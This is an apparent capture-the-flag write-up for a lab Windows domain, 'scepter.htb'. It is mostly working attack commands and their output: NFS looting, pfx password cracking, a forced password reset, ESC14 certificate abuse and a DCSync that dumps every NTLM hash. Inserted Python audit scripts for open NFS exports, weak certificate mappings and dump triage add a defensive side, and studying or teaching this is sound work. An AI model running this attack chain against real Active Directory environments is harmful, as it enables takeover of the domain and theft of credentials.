Basic information
Port scan
No web service; just the usual Windows domain ports, plus NFS on 2049:
nmap -sC -sV -Pn 10.10.11.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 18:00 JST
Nmap scan report for 10.10.11.65
Host is up (0.10s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-22 16:41:55Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/tcp6    rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  2,3,4      111/udp6    rpcbind
|   100003  2,3        2049/udp    nfs
|   100003  2,3        2049/udp6   nfs
|   100003  2,3,4      2049/tcp    nfs
|   100003  2,3,4      2049/tcp6   nfs
|   100005  1,2,3      2049/tcp    mountd
|   100005  1,2,3      2049/tcp6   mountd
|   100005  1,2,3      2049/udp    mountd
|   100005  1,2,3      2049/udp6   mountd
|   100021  1,2,3,4    2049/tcp    nlockmgr
|   100021  1,2,3,4    2049/tcp6   nlockmgr
|   100021  1,2,3,4    2049/udp    nlockmgr
|   100021  1,2,3,4    2049/udp6   nlockmgr
|   100024  1          2049/tcp    status
|   100024  1          2049/tcp6   status
|   100024  1          2049/udp    status
|_  100024  1          2049/udp6   status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:42:51+00:00; +7h40m18s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time.
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-04-22T16:42:51+00:00; +7h40m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41
|_Not valid after:  2025-11-01T00:41:41
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
|_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-04-22T16:42:44
|_  start_date: N/A
|_clock-skew: mean: 7h40m17s, deviation: 0s, median: 7h40m16s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.21 seconds
NFS
The NFS export requires no authentication; it exposes a helpdesk share containing a few certificate files:
showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)

mkdir nfs
sudo mount -t nfs 10.10.11.65:/helpdesk ./nfs
Copy all of them down.
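As an added defensive check (not part of the original writeup), here is a small Python audit that parses the text `showmount -e` prints, in the format shown above, and flags every export whose client list admits any host, which is exactly the `(everyone)` state of `/helpdesk` on this box. The sample output is constructed, with a restricted export added for contrast; the function and variable names are my own.

```python
"""Audit an NFS export list for world-mountable exports.

Added example, not code from the original writeup. Parses `showmount -e`
output and reports exports whose client specification allows any host.
"""
from __future__ import annotations

# Constructed sample in the format showmount -e prints: one open export (as on
# this box), one restricted to a subnet and a host, and one exported to '*'.
SAMPLE_SHOWMOUNT = """\
Export list for 10.10.11.65:
/helpdesk (everyone)
/backups  10.10.11.0/24,admin.scepter.htb
/srv/data *
"""

# Client specifications that mean "any client may mount this export".
OPEN_CLIENTS = {"everyone", "*"}


def parse_showmount(text: str) -> dict[str, list[str]]:
    """Return {export_path: [client_spec, ...]} from showmount -e output."""
    exports: dict[str, list[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list for"):
            continue  # header line carries no export
        # showmount prints the path, whitespace, then a comma-separated client
        # list; the list is wrapped in parentheses when it is '(everyone)'.
        path, _, clients = line.partition(" ")
        clients = clients.strip().strip("()")
        exports[path] = [c.strip() for c in clients.split(",") if c.strip()]
    return exports


def open_exports(text: str) -> list[str]:
    """Paths that any host can mount (client list is 'everyone' or '*')."""
    return sorted(
        path
        for path, clients in parse_showmount(text).items()
        if any(c in OPEN_CLIENTS for c in clients)
    )


if __name__ == "__main__":
    for path in open_exports(SAMPLE_SHOWMOUNT):
        print(f"OPEN TO ALL HOSTS: {path}")
```

Feed it the real `showmount -e` output of each NFS server during an audit; any path it reports should be restricted to explicit client addresses in the server's export configuration or, for sensitive data such as the certificate files here, not exported at all.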
pfx
These are presumably ADCS-related. Using them directly requires a password, and baker's material is a crt and key pair that first has to be converted to a pfx. The password comes from cracking one of the other pfx files; the certificate files all share the same password:
faketime "$(curl -sik http://10.10.11.65:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash
python3 pfx2john.py scott.pfx > scott.hash
sudo john scott.hash --wordlist=/usr/share/wordlists/rockyou.txt
newpassword
openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt
certipy-ad cert -export -pfx baker.pfx -password newpassword -out baker_unprotected.pfx
certipy-ad auth -pfx baker_unprotected.pfx -dc-ip 10.10.11.65 -domain scepter.htb d.baker@scepter.htb
18b5fb0d99e7a475316213c15b6f22ce
# only baker's certificate yields a hash; the other pfx files are revoked
BloodHound
With valid credentials in hand, the next step is the usual BloodHound collection:
bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d 'scepter.htb' -ns 10.10.11.65 --zip -c All -dc 'dc01.scepter.htb'
The obvious next step: d.baker can force a password change on a.carter:
a.carter
Force-change a.carter's password:
bloodyAD --host "10.10.11.65" -u 'd.baker' -p 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d 'scepter.htb' set password "a.carter" "Password@987"
a.carter is a member of the IT Support group and has GenericAll over the STAFF ACCESS CERTIFICATE OU:
And the STAFF ACCESS CERTIFICATE OU contains only one user, d.baker, who is already under our control:
ESC14 to h.brown
With what we have, we fully control d.baker, including the ability to modify his attributes, which satisfies the conditions for ESC14:
# The GenericAll seen above may have been granted by someone else; adding it ourselves also works
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" --dc-ip "10.10.11.65" add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" "a.carter"
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" set object "d.baker" mail -v "h.brown@scepter.htb"
Now we can request a certificate for h.brown through the modified mail attribute:
impacket-getTGT scepter.htb/d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce -dc-ip 10.10.11.65
export KRB5CCNAME="d.baker.ccache"
certipy-ad req -k -username "h.brown" -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' -out h.brown
certipy-ad auth -pfx h.brown.pfx -dc-ip 10.10.11.65 -domain scepter.htb -username "h.brown"
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
user flag
Log in to WinRM with Kerberos authentication:
export KRB5CCNAME=h.brown.ccache
evil-winrm -i dc01.scepter.htb -r scepter.htb
/etc/krb5.conf
[libdefaults]
    default_realm = SCEPTER.HTB
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    SCEPTER.HTB = {
        kdc = dc01.scepter.htb
        admin_server = dc01.scepter.htb
    }

[domain_realm]
    .scepter.htb = SCEPTER.HTB
    scepter.htb = SCEPTER.HTB
ADCS to p.adams
h.brown is a member of the Certificate Management Service group, so the same approach can modify other users' certificate-related attributes. p.adams, for example, holds DCSync rights, so we run ESC14 through d.baker again, exactly as before:
export KRB5CCNAME=h.brown.ccache
# as h.brown, set the altSecurityIdentities attribute of p.adams
bloodyAD -d "scepter.htb" -u "h.brown" -k --host "dc01.scepter.htb" --dc-ip "10.10.11.65" set object "p.adams" altSecurityIdentities -v "X509:<RFC822>p.adams@scepter.htb"
# change d.baker's mail attribute
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" set object "d.baker" mail -v "p.adams@scepter.htb"
export KRB5CCNAME="d.baker.ccache"
# as d.baker, request a certificate for p.adams
certipy-ad req -k -username "p.adams" -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' -out p.adams
# authenticate with the p.adams certificate (certipy writes it as p.adams.pfx)
certipy-ad auth -pfx "p.adams.pfx" -domain "scepter.htb" -dc-ip "10.10.11.65" -username "p.adams"
# DCSync
impacket-secretsdump -just-dc-user administrator scepter.htb/p.adams@dc01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
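Both ESC14 steps above (against h.brown and against p.adams) hinge on an altSecurityIdentities value of the `X509:<RFC822>...` form, which binds an account to an e-mail address rather than to one specific certificate. As an added example, not code from the writeup or from any of the tools it uses, the following Python classifies altSecurityIdentities values as strong or weak mappings using the mapping types Microsoft defines in KB5014754, so a defender can sweep a directory export for the weak kind. The directory snapshot is constructed (the p.adams value is the one the writeup sets; the serial number and SKI are made up), and all function names are my own.

```python
"""Classify altSecurityIdentities values as strong or weak certificate mappings.

Added example, not code from the original writeup. Mapping types and their
strong/weak status follow Microsoft KB5014754; the directory snapshot below
is constructed.
"""
from __future__ import annotations
import re

# Mapping type (the tags concatenated, payloads removed) -> True if strong.
MAPPING_STRENGTH = {
    "<I><SR>": True,        # issuer + certificate serial number
    "<SKI>": True,          # subject key identifier
    "<SHA1-PUKEY>": True,   # SHA-1 of the certificate's public key
    "<I><S>": False,        # issuer + subject name
    "<S>": False,           # subject name only
    "<RFC822>": False,      # e-mail address only (the form set on p.adams above)
}

_TAG_RE = re.compile(r"<[A-Z0-9-]+>")


def classify_mapping(value: str) -> tuple[str, bool]:
    """Return (mapping_type, is_strong) for one altSecurityIdentities value.

    The tags (<I>, <SR>, <S>, ...) are collected in order and joined, so
    'X509:<I>DC=htb,...<SR>1a2b' classifies as '<I><SR>'.
    """
    value = value.strip()
    if not value.startswith("X509:"):
        raise ValueError(f"not an X509 mapping: {value!r}")
    mapping_type = "".join(_TAG_RE.findall(value[len("X509:"):]))
    if mapping_type not in MAPPING_STRENGTH:
        raise ValueError(f"unrecognised mapping type {mapping_type!r} in {value!r}")
    return mapping_type, MAPPING_STRENGTH[mapping_type]


def weak_mappings(directory: dict[str, list[str]]) -> list[tuple[str, str]]:
    """(account, value) pairs whose mapping is weak, sorted by account name."""
    found = []
    for account, values in directory.items():
        for v in values:
            _, strong = classify_mapping(v)
            if not strong:
                found.append((account, v))
    return sorted(found)


# Constructed snapshot: sAMAccountName -> altSecurityIdentities values.
SAMPLE_DIRECTORY = {
    "p.adams": ["X509:<RFC822>p.adams@scepter.htb"],
    "svc.backup": ["X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>1a2b3c4d"],  # made-up serial
    "h.brown": [
        "X509:<S>CN=h.brown,OU=Staff,DC=scepter,DC=htb",
        "X509:<SKI>0123456789abcdef0123456789abcdef01234567",  # made-up SKI
    ],
}

if __name__ == "__main__":
    for account, value in weak_mappings(SAMPLE_DIRECTORY):
        print(f"WEAK  {account}: {value}")
```

Run it over an LDAP export of every account that carries altSecurityIdentities. Two mitigations follow from what it finds: on the domain controllers, the Kdc service's StrongCertificateBindingEnforcement value set to 2 (Full Enforcement) makes the KDC reject weak mappings outright, and write access to altSecurityIdentities (here, the Certificate Management Service group's rights) should be treated as equivalent to control of the mapped accounts and audited accordingly.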
root flag
Log in with the Administrator hash:
evil-winrm -i 10.10.11.65 -u Administrator -H a291ead3493f9773dc615e66c2ea21c4
hashdump
impacket-secretsdump scepter.htb/p.adams@dc01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0 -just-dc-ntlm
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Cleaning up...
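A dump like the one above is also what an incident responder ends up holding after a DCSync is detected, and the first questions are which accounts have an empty password, which share a password, and which machine accounts are in scope for rotation. As an added example, not code from the writeup or from impacket, the following Python parses secretsdump's `user:rid:lmhash:nthash:::` lines and answers those questions. The sample dump is constructed in that format; the svc.legacy line is invented to show the password-reuse case, and the helper names are my own.

```python
"""Triage a secretsdump NTDS dump for credential-hygiene problems.

Added example, not code from the original writeup. Parses lines in the
user:rid:lmhash:nthash::: format, skips status lines, and reports empty
passwords, shared NT hashes (password reuse) and machine accounts.
"""
from __future__ import annotations
from collections import defaultdict
import re

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

_LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample in secretsdump's output format; svc.legacy is invented to
# reuse d.baker's hash, and the trailing status line must be ignored.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
scepter.htb\\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\\svc.legacy:2200:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Cleaning up...
"""


def parse_dump(text: str) -> list[dict]:
    """Return one record per credential line; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = _LINE_RE.match(line.strip())
        if not m:
            continue  # e.g. "[*] Cleaning up..."
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["user"] = rec["user"].split("\\")[-1]  # drop the "domain\" prefix
        records.append(rec)
    return records


def empty_password_accounts(records: list[dict]) -> list[str]:
    """Accounts whose NT hash is the hash of the empty password."""
    return sorted(r["user"] for r in records if r["nt"] == EMPTY_NT_HASH)


def shared_hashes(records: list[dict]) -> dict[str, list[str]]:
    """NT hash -> accounts, for hashes used by more than one account."""
    by_hash: dict[str, list[str]] = defaultdict(list)
    for r in records:
        by_hash[r["nt"]].append(r["user"])
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def machine_accounts(records: list[dict]) -> list[str]:
    """Computer accounts (sAMAccountName ends in '$')."""
    return sorted(r["user"] for r in records if r["user"].endswith("$"))


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    print("empty passwords :", empty_password_accounts(recs))
    print("shared hashes   :", shared_hashes(recs))
    print("machine accounts:", machine_accounts(recs))
```

An empty hash on a disabled account such as Guest is expected; on an enabled account it is an immediate finding. Every account in a dump that has left the domain's control, machine accounts and krbtgt included, needs its credential rotated (krbtgt twice) regardless of what the triage shows.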
Last updated: 2025-07-26 10:15:17